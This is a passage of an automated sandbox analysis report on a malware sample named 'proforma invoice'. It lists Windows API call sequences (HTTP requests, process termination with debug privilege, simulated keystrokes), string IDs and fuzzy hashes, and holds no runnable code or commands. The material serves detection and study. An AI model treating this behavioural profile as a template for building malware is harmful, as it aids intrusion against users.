                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CurrentDirectory$AttributesFile
                  • String ID: *.*
                  • API String ID: 769691225-438819550
                  • Opcode ID: 7e52421ff8b9914ce4fab4880e57e7cbc19a4358445ccb82a0a8317a9d49579b
                  • Instruction ID: 8e4486b25b937188d30b5711701bae2e1aa679db66f5d046c74c4731e09fd2f9
                  • Opcode Fuzzy Hash: 7e52421ff8b9914ce4fab4880e57e7cbc19a4358445ccb82a0a8317a9d49579b
                  • Instruction Fuzzy Hash: FC8191725482459BCB20EF54C8849EEB7E8FF89310F9448AEF885D7250DF35DD858B92
                  APIs
                  • SetWindowLongW.USER32(?,000000EB), ref: 00AA5C7A
                    • Part of subcall function 00AA5D0A: GetClientRect.USER32(?,?), ref: 00AA5D30
                    • Part of subcall function 00AA5D0A: GetWindowRect.USER32(?,?), ref: 00AA5D71
                    • Part of subcall function 00AA5D0A: ScreenToClient.USER32(?,?), ref: 00AA5D99
                  • GetDC.USER32 ref: 00AE46F5
                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AE4708
                  • SelectObject.GDI32(00000000,00000000), ref: 00AE4716
                  • SelectObject.GDI32(00000000,00000000), ref: 00AE472B
                  • ReleaseDC.USER32(?,00000000), ref: 00AE4733
                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AE47C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                  • String ID: U
                  • API String ID: 4009187628-3372436214
                  • Opcode ID: c8b25a79d1fbb73b852a0011ce745f2a953a636b4e6ef678208368ee458808d5
                  • Instruction ID: 89d5d0fbada04375cd68a8fc7fe77692dd1687571eca60d8b70602d4d8073464
                  • Opcode Fuzzy Hash: c8b25a79d1fbb73b852a0011ce745f2a953a636b4e6ef678208368ee458808d5
                  • Instruction Fuzzy Hash: 1B71F330800245DFCF218F69C984ABA7BB9FF4E360F244269ED555B1AAC7318C81DFA0
                  APIs
                  • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00B135E4
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • LoadStringW.USER32(00B72390,?,00000FFF,?), ref: 00B1360A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LoadString$_wcslen
                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                  • API String ID: 4099089115-2391861430
                  • Opcode ID: 52d1df82a5b01fd495d1b6e483bc4cfb911d28b725599e7018b17ff085e01592
                  • Instruction ID: f26487777b1d8bdf11e09a851b55d9fd3c5a3f5355255d67c10a6794628414e5
                  • Opcode Fuzzy Hash: 52d1df82a5b01fd495d1b6e483bc4cfb911d28b725599e7018b17ff085e01592
                  • Instruction Fuzzy Hash: BB515C72800219BADF15EBA0CD42EEEBBB8EF15740F5441A5F105731E2EB311A99DFA1
                  APIs
                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1C272
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B1C29A
                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B1C2CA
                  • GetLastError.KERNEL32 ref: 00B1C322
                  • SetEvent.KERNEL32(?), ref: 00B1C336
                  • InternetCloseHandle.WININET(00000000), ref: 00B1C341
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                  • String ID:
                  • API String ID: 3113390036-3916222277
                  • Opcode ID: cbf778069a762725faf658f4a544b648c881a889e92dafbed7f2cd3bba2ccd67
                  • Instruction ID: 8271e2d11ca4e858e3f9677198af3a5510d3cc52218806498244ae4f6589daf9
                  • Opcode Fuzzy Hash: cbf778069a762725faf658f4a544b648c881a889e92dafbed7f2cd3bba2ccd67
                  • Instruction Fuzzy Hash: EE317FB1540204AFD7219FA59C88AEF7FFCEB49744B50855DF456E3200DB30DD849B65
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AE3AAF,?,?,Bad directive syntax error,00B3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B098BC
                  • LoadStringW.USER32(00000000,?,00AE3AAF,?), ref: 00B098C3
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B09987
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HandleLoadMessageModuleString_wcslen
                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                  • API String ID: 858772685-4153970271
                  • Opcode ID: b038935bb5f77bfad3bc5257b4ce12b44b79c92bf7a02db4ed78a028d4005310
                  • Instruction ID: 1c968eb40666d058885000ce93ef3a7ea129c8083ef5a64f8b69b58a4f325e8f
                  • Opcode Fuzzy Hash: b038935bb5f77bfad3bc5257b4ce12b44b79c92bf7a02db4ed78a028d4005310
                  • Instruction Fuzzy Hash: E921603280021AAFCF16AF90CD06EEE7BB9FF19700F044495F515660E2EF759A18DB61
                  APIs
                  • GetParent.USER32 ref: 00B020AB
                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00B020C0
                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B0214D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameParentSend
                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                  • API String ID: 1290815626-3381328864
                  • Opcode ID: 1d0c2778dd22c003b004193c32c08d0f5fa787481da9d918537f4b7230a065b1
                  • Instruction ID: 29d072581c973372328c6f2fc84c4f58d75490a84719efb22cdb2cf338e03dc9
                  • Opcode Fuzzy Hash: 1d0c2778dd22c003b004193c32c08d0f5fa787481da9d918537f4b7230a065b1
                  • Instruction Fuzzy Hash: CA112976688706B9FA252720DC0FDEA7BDCCF09364F21019AFB04B60E1FE65685A5618
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                  • String ID:
                  • API String ID: 1282221369-0
                  • Opcode ID: f0efd0585dd81c94fc82b4bf809f11354b23b26d0771fa24bcf6820775874633
                  • Instruction ID: c1044a71d68c50fcbd8b425dfc202f34a0888417eaabe110925f0339e5881e3b
                  • Opcode Fuzzy Hash: f0efd0585dd81c94fc82b4bf809f11354b23b26d0771fa24bcf6820775874633
                  • Instruction Fuzzy Hash: 2F6147B1904302AFDB21AFB8D985BAD7BA5EF09320F44416FF947A7381EA319D41D790
                  APIs
                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00B35186
                  • ShowWindow.USER32(?,00000000), ref: 00B351C7
                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 00B351CD
                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00B351D1
                    • Part of subcall function 00B36FBA: DeleteObject.GDI32(00000000), ref: 00B36FE6
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B3520D
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B3521A
                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B3524D
                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00B35287
                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00B35296
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                  • String ID:
                  • API String ID: 3210457359-0
                  • Opcode ID: 82e45f5fa9b0ab3dfa1b46ccac1920ab60881cb385ca06e5a791eabea8354187
                  • Instruction ID: 6e5ac436cb02a918af14e575bf32befc3617d43b9a1bb6892b59ae2b15caf09e
                  • Opcode Fuzzy Hash: 82e45f5fa9b0ab3dfa1b46ccac1920ab60881cb385ca06e5a791eabea8354187
                  • Instruction Fuzzy Hash: C7519130A50A08BFEF309F64CC46BDA3BE5EB05321F348591FA15A72E1CB75A990DB40
                  APIs
                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00AF6890
                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00AF68A9
                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00AF68B9
                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00AF68D1
                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00AF68F2
                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00AF6901
                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00AF691E
                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00AF692D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                  • String ID:
                  • API String ID: 1268354404-0
                  • Opcode ID: 4a66c713a497472d50b3ffee85125d02b5f7b26bad2e81fef7e714f684aa9a38
                  • Instruction ID: a9cfc17c914954bad923e38aad6c388bceaf9df52a48cc5f8c0ac9eea5d5df33
                  • Opcode Fuzzy Hash: 4a66c713a497472d50b3ffee85125d02b5f7b26bad2e81fef7e714f684aa9a38
                  • Instruction Fuzzy Hash: 29518870600209EFDB20CF68CC95FAE7BB9EF58750F204518FA16A72A0DB74E991DB50
                  APIs
                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1C182
                  • GetLastError.KERNEL32 ref: 00B1C195
                  • SetEvent.KERNEL32(?), ref: 00B1C1A9
                    • Part of subcall function 00B1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1C272
                    • Part of subcall function 00B1C253: GetLastError.KERNEL32 ref: 00B1C322
                    • Part of subcall function 00B1C253: SetEvent.KERNEL32(?), ref: 00B1C336
                    • Part of subcall function 00B1C253: InternetCloseHandle.WININET(00000000), ref: 00B1C341
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                  • String ID:
                  • API String ID: 337547030-0
                  • Opcode ID: 70c1be7499fd3bc2c03525a0c1b3d0039f8aca70c1d3810cde15a29543dbd104
                  • Instruction ID: 6f1c422700dedc276d741c4945e671b3bb179b2b3703f69317886cc090fb1eb1
                  • Opcode Fuzzy Hash: 70c1be7499fd3bc2c03525a0c1b3d0039f8aca70c1d3810cde15a29543dbd104
                  • Instruction Fuzzy Hash: 0F317A71280601EFDB219FE5DC48AAABFF9FF18300B50445DF95A93610DB30E9949BA0
                  APIs
                    • Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
                    • Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
                    • Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B025BD
                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B025DB
                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B025DF
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B025E9
                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B02601
                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B02605
                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B0260F
                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B02623
                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B02627
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                  • String ID:
                  • API String ID: 2014098862-0
                  • Opcode ID: 7ece0f3a2372bf6352220c7aa7a772ad4b25404f36e34a3b9fea6dbe0a9fba20
                  • Instruction ID: ae09bbbb6b563360615e7eb33daebdffbf2da34ae1decd7393d6a5731c4c8311
                  • Opcode Fuzzy Hash: 7ece0f3a2372bf6352220c7aa7a772ad4b25404f36e34a3b9fea6dbe0a9fba20
                  • Instruction Fuzzy Hash: EA01D431390610BBFB1067A89C8EF5D3F99EB4EB12F200001F318BF0E1CDE224449A69
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B01449,?,?,00000000), ref: 00B0180C
                  • HeapAlloc.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B01813
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B01449,?,?,00000000), ref: 00B01828
                  • GetCurrentProcess.KERNEL32(?,00000000,?,00B01449,?,?,00000000), ref: 00B01830
                  • DuplicateHandle.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B01833
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B01449,?,?,00000000), ref: 00B01843
                  • GetCurrentProcess.KERNEL32(00B01449,00000000,?,00B01449,?,?,00000000), ref: 00B0184B
                  • DuplicateHandle.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B0184E
                  • CreateThread.KERNEL32(00000000,00000000,00B01874,00000000,00000000,00000000), ref: 00B01868
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                  • String ID:
                  • API String ID: 1957940570-0
                  • Opcode ID: 48a64d5271aa6f866dd6648d23662723e9177888ae2a7e29ffaec21b9cf84c9e
                  • Instruction ID: 90d638d9c879a5c06dc8c3eae28ca26b1a5ee483e77677ad4cd6c2133ba22c4d
                  • Opcode Fuzzy Hash: 48a64d5271aa6f866dd6648d23662723e9177888ae2a7e29ffaec21b9cf84c9e
                  • Instruction Fuzzy Hash: 1F01BBB5240708BFE710ABA5DC4DF6B3FACEB89B11F108411FA05EB1A1CA70D810DB20
                  APIs
                    • Part of subcall function 00B0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00B0D501
                    • Part of subcall function 00B0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00B0D50F
                    • Part of subcall function 00B0D4DC: CloseHandle.KERNEL32(00000000), ref: 00B0D5DC
                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2A16D
                  • GetLastError.KERNEL32 ref: 00B2A180
                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2A1B3
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B2A268
                  • GetLastError.KERNEL32(00000000), ref: 00B2A273
                  • CloseHandle.KERNEL32(00000000), ref: 00B2A2C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                  • String ID: SeDebugPrivilege
                  • API String ID: 2533919879-2896544425
                  • Opcode ID: ac54e404d5877f7f1eed021afd2bf6744b76efcfa6cd9f0dd387e6b4e3cd1fcc
                  • Instruction ID: b64a7699e49730fc8e414259d97ddcee332ee2b2334f93679d8068c5e9db7ba7
                  • Opcode Fuzzy Hash: ac54e404d5877f7f1eed021afd2bf6744b76efcfa6cd9f0dd387e6b4e3cd1fcc
                  • Instruction Fuzzy Hash: 01618E302042529FD720DF18D494F1ABBE5EF45318F18849CE46A9B7A3C776EC49CB92
                  APIs
                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B33925
                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00B3393A
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B33954
                  • _wcslen.LIBCMT ref: 00B33999
                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B339C6
                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B339F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$Window_wcslen
                  • String ID: SysListView32
                  • API String ID: 2147712094-78025650
                  • Opcode ID: 6836185ec7c77413264cba90a2e8f7a896e93542eb412db1979770f7d0b4a295
                  • Instruction ID: bd2f9f7b345421ccd6f4d283410bfe7642f2413a5586a66d1e6016e3b55fdf54
                  • Opcode Fuzzy Hash: 6836185ec7c77413264cba90a2e8f7a896e93542eb412db1979770f7d0b4a295
                  • Instruction Fuzzy Hash: C741A471A00218ABEB219F64CC45FEF7BE9EF08754F200566F559E7291D7719D80CB90
                  APIs
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B0BCFD
                  • IsMenu.USER32(00000000), ref: 00B0BD1D
                  • CreatePopupMenu.USER32 ref: 00B0BD53
                  • GetMenuItemCount.USER32(014F6228), ref: 00B0BDA4
                  • InsertMenuItemW.USER32(014F6228,?,00000001,00000030), ref: 00B0BDCC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                  • String ID: 0$2
                  • API String ID: 93392585-3793063076
                  • Opcode ID: 1123c3b771c50165c0605b4afd61c00c34d6726eb868c9cee030da66a4ef763d
                  • Instruction ID: 0225c6be0efb4ea36df9a9bbb03fcab3c49cc55676dad1d34288709793128b96
                  • Opcode Fuzzy Hash: 1123c3b771c50165c0605b4afd61c00c34d6726eb868c9cee030da66a4ef763d
                  • Instruction Fuzzy Hash: 5F518C70A00206EBDB20DFA8D889FAEFFF4EF55354F2482A9E411A72D1D7709945CB61
                  APIs
                  • LoadIconW.USER32(00000000,00007F03), ref: 00B0C913
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: IconLoad
                  • String ID: blank$info$question$stop$warning
                  • API String ID: 2457776203-404129466
                  • Opcode ID: c6ededa03912db855b972d332d83fc185372695c763e1f07eae9bfbc5d6cc6f4
                  • Instruction ID: 88d5aac780fb02eab6c6202d7953c675cab27e1376fcdb2b154d2040858be893
